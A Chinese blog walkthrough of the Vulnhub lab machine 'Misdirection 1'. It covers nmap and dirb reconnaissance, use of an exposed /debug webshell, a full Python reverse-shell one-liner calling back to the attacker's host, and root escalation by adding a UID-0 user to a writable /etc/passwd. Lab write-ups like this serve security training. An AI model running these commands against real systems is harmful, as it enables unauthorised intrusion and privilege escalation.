Vulnhub-靶机-Misdirection 1

最新推荐文章于 2024-02-10 22:24:40 发布
最新推荐文章于 2024-02-10 22:24:40 发布
阅读量586 收藏 1
点赞数 1
分类专栏: Vulnhub-靶机 文章标签: 渗透测试 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/113243617
版权

Vulnhub—靶机—Misdirection 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/symfonos-52,415/

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.110.0/24
在这里插入图片描述
【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.130
在这里插入图片描述
【步骤三】目标开放80及8080俩个http服务端口,使用dirb进行目录枚举
【命令】dirb http://192.168.110.130:80
【命令】nmap -n -sC -sV -p- 192.168.110.130
在这里插入图片描述

【命令】dirb http://192.168.110.130:8080
在这里插入图片描述
【步骤四】访问web目录
【命令】http://192.168.110.130:8080/debug
【分析】80端口目录都是空的可能是蜜罐,8080端口下面debug发现是一个webshell
在这里插入图片描述

二、漏洞利用

【步骤五】kali上使用nc监听1234端口,web上执行python反弹shell
【命令】

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

【分析】80端口目录都是空的可能是蜜罐,8080端口下面debug发现是一个webshell
在这里插入图片描述

在这里插入图片描述
【步骤六】sudo切换用户
【命令】Sudo -u brexit /bin/bash
【分析】在home下发现名为brexit的目录,但是没有查看权限,查看配置文件发现存在brexit这个用户,尝试使用sudo切换用户
在这里插入图片描述
【步骤七】查看用户文件权限
【命令】ls -la
【分析】查看etc下配置文件权限,发现passwd文件有可写入权限
在这里插入图片描述
【步骤八】写入一个用户uid为0,使用openssl对准备使用的密码进行加密
【命令】Openssl passwd -l 123456
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
【步骤九】切换用户enst查看flag
【命令】su - enst
在这里插入图片描述

三、Flag

【flag】:0d2c6222bfdd3701e0fa12a9a9dc9c8c

夜白君
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Misdirection 1--VulnHub系列学习记录
weixin_45509443的博客
07-25 296
了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式
Vulnhub靶机MISDIRECTION_ 1
LainWith的博客
01-06 965
系列:Misdirection(此系列共1台) 发布日期:2019 年 9 月 24 日 难度:初级 运行环境:官方推荐Virtualbox,我使用的是VMware 补充:靶机容易被干崩,下手轻点 目标:取得 root 权限 学习:靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/netdiscover主机发现 主机信息探测 nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报 80端口常规探测没有发现什么有趣的信息,但是nmap发现了8
红队打靶练习:MISDIRECTION: 1
分享
12-29 679
红队打靶练习:MISDIRECTION: 1 ; 犹如野鹅追逐般的紧张感......
Vulnhub:Misdirection 1靶机
qq_43884092的博客
04-17 151
8080端口/debug目录,是一个可以执行命令的shell,bash和写入用户提权
vulnhub靶机Misdirection
0of_blog
05-01 744
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
红队打靶:Misdirection打靶思路详解(vulnhub
Bossfrank的博客
10-23 607
本文是vulnhub靶机Misdirection的详细打靶过程。靶机不难,关键点在于找到合适的突破口,不要在看似繁多的攻击面中徘徊。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等。
[VulnHub靶机渗透] Misdirection: 1
最新发布
人若无名,便可专心练剑
02-10 908
靶机精讲之Misdirection,vulnhub靶机,不难,但开始阶段很容易被误导,渗透目标选择的优先级容易选错以致费时,死磕一点还是快速跳跃,需要权衡、经验和智慧。用webshell获得系统立足点,两次提权获得root权限。这台机器很标准,其中多了一点点曲折和趣味,是高仿真场景的抽象,规模不大,但渗透体验很棒,细节满满。
“突破重围:探索OSCP渗透测试场景中的难题与解决方案“
A485860941的博客
07-17 982
在OSCP渗透测试认证中,靶场的红队是极具挑战性和实战性的对手,他们不仅拥有深厚的安全知识和技能,还能模拟真实世界中的攻击场景。本文将探索OSCP靶场中超级厉害的红队,介绍他们的攻击策略和技术手段,并分享一些应对策略和解决方案,帮助渗透测试人员更好地应对实际攻击。
Vulnhub靶机实战之HA: Forensics(1)
m0_54178755的博客
11-20 310
取证是实验室的中级水平,它可以让您掌握网络取证调查的真实经验。该实验室完全致力于网络取证调查的方法和工具,并且可以通过各种技术找到证据。由于它是夺旗,因此请务必注意,它不是一个根本挑战,并且具有找到所有旗帜的主要动机。旗帜数量: 4目标:找到所有 4 个标志(获取根不是目标)
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2022
VulnHub-DarkHole:1靶机详细渗透教程
ctf训练 Capture the Flag
qq_43799246的博客
12-03 1287
ctf训练 Capture the Flag CTF介绍 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag",也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag"。 CTF比赛中涉及内容比较繁杂,我们要利用所有可以利用的方法获得flag。 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.
[kali]--攻击浏览器漏洞
wwxxee
11-06 1364
攻击浏览器漏洞 Web浏览器时渲染和还原页面信息的应用程序,如果浏览器打开的页面含有触发漏洞的恶意代码,那么我们就有机会控制浏览器的下一步动作,执行payload。 Aurora攻击 2010年,Aurora攻击利用了一个存在于当时IE浏览器中尚未修复的0day漏洞。 环境: 实验的winxp靶机上有安装IE浏览器且没有安装Aurora的漏洞更新补丁。 kali:192.168.17.129 winxp:192.168.17.130 1.设置模块 我们利用meatasploit的Aurora模块
vulnhub-Symfonos5
qq_41810304的博客
03-06 589
下载地址:https://www.vulnhub.com/entry/symfonos-5,415/ 前言: 文中提到的工具和漏洞仅供学习。此文较长看起来有点费时间,并且靶机做起来的时候思维有点混乱,所以也写得不是很有逻辑性。作为小白(省略) Kali:192.168.109.129 目标机:192.168.109.142 端口扫描: TCP: 漏洞挖掘: 从扫描信息来看,先访...
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1151
Vulnhub靶机—Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub靶机—Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值